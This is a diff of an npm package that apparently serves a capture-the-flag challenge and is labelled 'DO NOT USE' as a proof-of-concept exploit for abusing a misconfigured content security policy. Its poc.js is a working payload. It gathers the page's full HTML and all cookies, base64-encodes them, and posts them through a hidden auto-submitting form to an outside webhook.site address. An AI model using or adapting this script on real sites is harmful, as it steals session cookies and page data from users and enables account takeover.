@milymilo/ctf-poc-unpkg 1.0.2

package/README.md

@@ -0,0 +1,5 @@
+# DO NOT USE
+
+This package is a PoC exploit demonstrating misconfigured CSP.
+
+It's nothing interesting, and shouldn't be used by anyone.

package/package.json

@@ -0,0 +1,11 @@
+{
+  "name": "@milymilo/ctf-poc-unpkg",
+  "version": "1.0.2",
+  "description": "DO NOT USE - This package is a PoC exploit demonstrating data exfiltration via public CDN networks abusing misconfigured CSP.",
+  "main": "poc.js",
+  "scripts": {
+    "test": "echo \"Error: no test specified\" && exit 1"
+  },
+  "author": "",
+  "license": "ISC"
+}

package/poc.js

@@ -0,0 +1,28 @@
+const vForm = (action, method, fields) => {
+    const form = document.createElement('form')
+    form.setAttribute('hidden', 'true')
+    form.setAttribute('action', action)
+    form.setAttribute('method', method)
+
+    fields.forEach(field => {
+        const tmp = document.createElement('input')
+        tmp.setAttribute('type', field.type || 'text')
+        tmp.setAttribute('name', field.name || '')
+        tmp.setAttribute('value', field.value || '')
+        form.appendChild(tmp)
+    })
+
+    document.body.appendChild(form)
+    form.submit()
+}
+
+(async () => {
+    const data = btoa(JSON.stringify({
+        document: document.documentElement.innerHTML,
+        cookies: document.cookie
+    }));
+
+    vForm("https://webhook.site/c1289a5d-3cd8-4178-9f11-678cc96f225a", 'POST', [
+        { name: 'data', value: data },
+    ]);
+})()